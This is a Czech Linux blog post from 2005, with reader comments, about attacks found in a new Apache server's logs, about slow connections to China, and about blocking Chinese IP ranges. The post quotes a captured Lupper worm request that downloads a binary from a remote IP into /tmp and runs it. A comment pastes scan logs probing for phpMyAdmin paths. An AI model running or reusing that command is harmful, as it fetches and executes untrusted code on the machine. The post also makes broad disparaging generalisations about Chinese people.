Portál AbcLinuxu, 30. dubna 2025 12:47

Globální mánie HTTP útoků a Čína

16.11.2005 21:04 | Přečteno: 1411× | Ostatní | poslední úprava: 16.11.2005 21:10

Na svůj free vserver u Pípni jsem si dal Apache 2. To, že někdo občas pálí do SSH mě nijak nepřekvapuje, ale pohled do logu Apache byl pro mě šok.

Vůbec jsem nečekal, že je mánie útoků na webservery tak veliká. Už jenom za půlhodinu běhu webserveru na mě nějaké čínské univerzity trvale chrlí úplné kraviny a Američani se zase snaží o toto (úryvek z požadavku):


echo;echo YYY;cd /tmp;wget 24.224.174.18/listen;chmod +x listen;./listen 216.102.212.115;echo YYY;echo

Apache mám up2date, stránky tam prakticky zatím žádné nejsou, takže mě nijak neohrožují, ale i tak se odhodlávám k jednomu kroku: začít blokovat celé čínské ranky IP adres. Číňani mě nezajímají a jediné, co z jejich super země přes internet ke mě jde, jsou jen útoky a spam, kterému nerozumím.

Ale tohle není jediným důvodem, proč tohle píšu. Nedavno jsem něco stahoval a shodou náhod byl server v Číně. Překvapila mě velice nízká rychlost přenosu, která se příliš neliší ani u jiných čínských serverů a neliší se ani když zkusím přenos z jiného místa (kde mám lepší připojení). Ztráty paketů jsou šílené.

Skoro bych myslel, že je to délkou trasy do Číny...ale jiné státy (Austrálie, Japonsko, Jižní Korea) jsou na tom o poznání lépe. Častokrát slyším, že Čína není tak zlá, když se u nich může jakž takž svobodně brouzdat po internetu - a já se ptám: je tomu opravdu tak? Podle mých odhadů si toho moc ze zahraničí ani nepřečtou, protože by u toho loadování za chvíli zestárli...

       

Hodnocení: -

zatím nehodnoceno
        špatnédobré        

Tiskni Sdílej: Linkuj Jaggni to Vybrali.sme.sk Google Del.icio.us Facebook

Komentáře

Nástroje: Začni sledovat (2) ?Zašle upozornění na váš email při vložení nového komentáře. , Tisk

Vložit další komentář

vencour avatar 16.11.2005 21:12 vencour | skóre: 56 | blog: Tady je Vencourovo | Praha+západní Čechy
Rozbalit Rozbalit vše Re: Globální mánie HTTP útoků a Čína
Odpovědět | Sbalit | Link | Blokovat | Admin

Jak jsem slyšel, je v Číně cenzura netu. Tohle by to potvrzovalo. P.S. v trace je vidět časová dostupnost - dá se z ní něco vyčíst?

Ty nejhlubší objevy nečekají nutně za příští hvězdou. Jsou uvnitř nás utkány do vláken, která nás spojují, nás všechny.
Luboš Doležel (Doli) avatar 16.11.2005 21:15 Luboš Doležel (Doli) | skóre: 98 | blog: Doliho blog | Kladensko
Rozbalit Rozbalit vše Re: Globální mánie HTTP útoků a Čína
Vidím jen to, že za hranicemi (nebo vlastně na hranicích) se s pakety dějí divné věci - nahodile se zpožďují a ztrácejí se.
JiK avatar 17.11.2005 16:57 JiK | skóre: 13 | blog: Jirkoviny | Virginia
Rozbalit Rozbalit vše Re: Globální mánie HTTP útoků a Čína
zadnou cenzuru jsem nepozoroval, prijde mi to jako FUD, zil jsem v Shanghai nekolik mesicu, a zrizeni pevne linky a ADSL bylo vyrazne rychlejsi nez v Cechistanu.

Nenechte se pomylit, on v Cine zadny komunismus ani socialismus neni, tam je tak ostry kapitalismus ze by se z toho nam, lenivym evropanum jen protacely panenky (i tem kdo voli pravici).

Zdarma neni nic, od lekarske pece, pres skolstvi, kdy musis platit skolne uz od ZS jinak budes negramotny rolnik co taha pluh misto dobytka, statni firmy prakticky neexistuji, obchody maj otevreno 7-24 a stejne tak neexistuji odbory, soboty a nedele a jine socialisticke hovadiny...
Jirka Cech
17.11.2005 18:42 tomasgn | skóre: 23 | JN89GE
Rozbalit Rozbalit vše Re: Globální mánie HTTP útoků a Čína
BTW, ja tedy soboty a nedele za (socialisticke) hovadiny nepovazuji. naopak povazuji za hovadinu otviraci dobu vsude mozne od nevidim do nevidim.
Luboš Doležel (Doli) avatar 16.11.2005 21:17 Luboš Doležel (Doli) | skóre: 98 | blog: Doliho blog | Kladensko
Rozbalit Rozbalit vše Spam
Odpovědět | Sbalit | Link | Blokovat | Admin
Jinak tady vidíte, proč nemám rád Čínu...kdybych tomu spamu alespoň rozuměl - ale takhle :-(

Screenshot
Nejsemtu avatar 17.11.2005 10:47 Nejsemtu | skóre: 14 | blog: Nejde Smazat
Rozbalit Rozbalit vše Re: Spam
http://babel.altavista.com

Používám na prohlížení japonských a čínských stránek. Možná by to i ten spam přeložilo ;)).
16.11.2005 21:30 Ondřej Čečák | skóre: 33
Rozbalit Rozbalit vše Re: Globální mánie HTTP útoků a Čína
Odpovědět | Sbalit | Link | Blokovat | Admin
"Skoro bych myslel, že je to délkou trasy do Číny...ale jiné státy (Austrálie, Japonsko, Jižní Korea)"

Ruku do ohne (resp. nemam chut to overovat) bych za to nedal, ale neni od nas nahodou po tluste lince bliz do Australie nez do Ciny?
-- "Ja vim, on vi, ty pico!"
Luboš Doležel (Doli) avatar 16.11.2005 21:34 Luboš Doležel (Doli) | skóre: 98 | blog: Doliho blog | Kladensko
Rozbalit Rozbalit vše Re: Globální mánie HTTP útoků a Čína
To hodně závisí na trase...ode mě to do Austrálie jde přes USA, do Číny taky buď přes USA nebo jen přes německý T-Mobile a pak je tam rovnou Čína (ale lag to má taky šílený).

Jinde bude zase jiná trasa.
Luboš Doležel (Doli) avatar 16.11.2005 21:39 Luboš Doležel (Doli) | skóre: 98 | blog: Doliho blog | Kladensko
Rozbalit Rozbalit vše Re: Globální mánie HTTP útoků a Čína
Odpovědět | Sbalit | Link | Blokovat | Admin
Ten požadavek, co jsem napsal do blogu, byl na URL /cgi-bin/awstats/awstats.pl...takže Linux/Lupper.B útočí. Mám v logu i různé požadavky na xmlrpc (taky Lupper).
17.11.2005 08:32 Tomáš | skóre: 25 | Ústí nad Labem
Rozbalit Rozbalit vše Re: Globální mánie HTTP útoků a Čína
Odpovědět | Sbalit | Link | Blokovat | Admin
To já občas nacházím v logu apache věci jako: 

[Fri Nov 04 05:17:48 2005] [error] [client 200.190.117.50] File does not exist: /var/www/stats
[Fri Nov 04 05:17:48 2005] [error] [client 200.190.117.50] File does not exist: /var/www/awstats.pl
[Fri Nov 04 05:17:49 2005] [error] [client 200.190.117.50] File does not exist: /var/www/cgi
[Fri Nov 04 08:00:59 2005] [error] [client 66.135.37.138] File does not exist: /var/www/PMA
[Fri Nov 04 08:00:59 2005] [error] [client 66.135.37.138] File does not exist: /var/www/mysql
[Fri Nov 04 08:00:59 2005] [error] [client 66.135.37.138] File does not exist: /var/www/admin
[Fri Nov 04 08:01:00 2005] [error] [client 66.135.37.138] File does not exist: /var/www/db
[Fri Nov 04 08:01:00 2005] [error] [client 66.135.37.138] File does not exist: /var/www/dbadmin
[Fri Nov 04 08:01:00 2005] [error] [client 66.135.37.138] File does not exist: /var/www/web
[Fri Nov 04 08:01:00 2005] [error] [client 66.135.37.138] File does not exist: /var/www/admin
[Fri Nov 04 08:01:00 2005] [error] [client 66.135.37.138] File does not exist: /var/www/admin
[Fri Nov 04 08:01:00 2005] [error] [client 66.135.37.138] File does not exist: /var/www/admin
[Fri Nov 04 08:01:01 2005] [error] [client 66.135.37.138] File does not exist: /var/www/mysql-admin
[Fri Nov 04 08:01:01 2005] [error] [client 66.135.37.138] File does not exist: /var/www/phpmyadmin2
[Fri Nov 04 08:01:01 2005] [error] [client 66.135.37.138] File does not exist: /var/www/mysqladmin
[Fri Nov 04 08:01:01 2005] [error] [client 66.135.37.138] File does not exist: /var/www/mysql-admin
[client 66.135.37.138] script '/var/www/main.php' not found or unable to stat
[Fri Nov 04 08:01:01 2005] [error] [client 66.135.37.138] File does not exist: /var/www/phpMyAdmin-2.5.6
[Fri Nov 04 08:01:02 2005] [error] [client 66.135.37.138] File does not exist: /var/www/phpMyAdmin-2.5.4
[Fri Nov 04 08:01:02 2005] [error] [client 66.135.37.138] File does not exist: /var/www/phpMyAdmin-2.5.1
[Fri Nov 04 08:01:02 2005] [error] [client 66.135.37.138] File does not exist: /var/www/phpMyAdmin-2.2.3
[Fri Nov 04 08:01:02 2005] [error] [client 66.135.37.138] File does not exist: /var/www/phpMyAdmin-2.2.6
[Fri Nov 04 08:01:02 2005] [error] [client 66.135.37.138] File does not exist: /var/www/myadmin
[Fri Nov 04 08:20:20 2005] [error] [client 212.80.76.104] File does not exist: /var/www/register.py
[Fri Nov 04 11:22:07 2005] [error] [client 212.80.76.104] File does not exist: /var/www/register.py
[Fri Nov 04 16:59:48 2005] [error] [client 24.196.79.169] File does not exist: /var/www/PMA
[Fri Nov 04 16:59:48 2005] [error] [client 24.196.79.169] File does not exist: /var/www/mysql
[Fri Nov 04 16:59:48 2005] [error] [client 24.196.79.169] File does not exist: /var/www/admin
[Fri Nov 04 16:59:48 2005] [error] [client 24.196.79.169] File does not exist: /var/www/db
[Fri Nov 04 16:59:48 2005] [error] [client 24.196.79.169] File does not exist: /var/www/dbadmin
[Fri Nov 04 16:59:48 2005] [error] [client 24.196.79.169] File does not exist: /var/www/web
[Fri Nov 04 16:59:48 2005] [error] [client 24.196.79.169] File does not exist: /var/www/admin
[Fri Nov 04 16:59:49 2005] [error] [client 24.196.79.169] File does not exist: /var/www/admin
[Fri Nov 04 16:59:49 2005] [error] [client 24.196.79.169] File does not exist: /var/www/admin
[Fri Nov 04 16:59:49 2005] [error] [client 24.196.79.169] File does not exist: /var/www/mysql-admin
[Fri Nov 04 16:59:49 2005] [error] [client 24.196.79.169] File does not exist: /var/www/phpmyadmin2
[Fri Nov 04 16:59:49 2005] [error] [client 24.196.79.169] File does not exist: /var/www/mysqladmin
[Fri Nov 04 16:59:49 2005] [error] [client 24.196.79.169] File does not exist: /var/www/mysql-admin
[client 24.196.79.169] script '/var/www/main.php' not found or unable to stat
[Fri Nov 04 16:59:49 2005] [error] [client 24.196.79.169] File does not exist: /var/www/phpMyAdmin-2.5.6
[Fri Nov 04 16:59:49 2005] [error] [client 24.196.79.169] File does not exist: /var/www/phpMyAdmin-2.5.4
[Fri Nov 04 16:59:50 2005] [error] [client 24.196.79.169] File does not exist: /var/www/phpMyAdmin-2.5.1
[Fri Nov 04 16:59:50 2005] [error] [client 24.196.79.169] File does not exist: /var/www/phpMyAdmin-2.2.3
[Fri Nov 04 16:59:50 2005] [error] [client 24.196.79.169] File does not exist: /var/www/phpMyAdmin-2.2.6
[Fri Nov 04 16:59:50 2005] [error] [client 24.196.79.169] File does not exist: /var/www/myadmin
[Fri Nov 04 20:14:00 2005] [error] [client 195.38.80.134] File does not exist: /var/www/PMA
[Fri Nov 04 20:14:00 2005] [error] [client 195.38.80.134] File does not exist: /var/www/mysql
[Fri Nov 04 21:15:10 2005] [error] [client 195.38.80.134] File does not exist: /var/www/PMA
[Fri Nov 04 21:15:10 2005] [error] [client 195.38.80.134] File does not exist: /var/www/mysql
[Sat Nov 05 05:39:40 2005] [error] [client 24.86.124.214] File does not exist: /var/www/pk
[Sat Nov 05 09:06:31 2005] [error] [client 212.80.76.104] File does not exist: /var/www/register.py
[Sat Nov 05 17:30:38 2005] [error] [client 69.64.32.73] File does not exist: /var/www/cacti
[Sun Nov 06 05:35:28 2005] [error] [client 24.86.124.214] File does not exist: /var/www/pk
Ten stroj sice má veřejnou IP (logicky), ale žádná doména na něj nesměruje, google a jiní o něm ani nemají potuchu, takže co? Někdo projíždí rozsah IP adres a hledá známe exploity?
17.11.2005 09:56 trancelius | skóre: 22
Rozbalit Rozbalit vše Re: Globální mánie HTTP útoků a Čína
Někdo projíždí rozsah IP adres a hledá známe exploity?
Spíš něco, uživatel toho stroje o tom asi ani neví :)
nway avatar 17.11.2005 17:13 nway | skóre: 17 | Česká Lípa
Rozbalit Rozbalit vše Re: Globální mánie HTTP útoků a Čína
Jsem na tom úplně stejně, ale crond to uklidí :-).

Založit nové vláknoNahoru

ISSN 1214-1267, (c) 1999-2007 Stickfish s.r.o.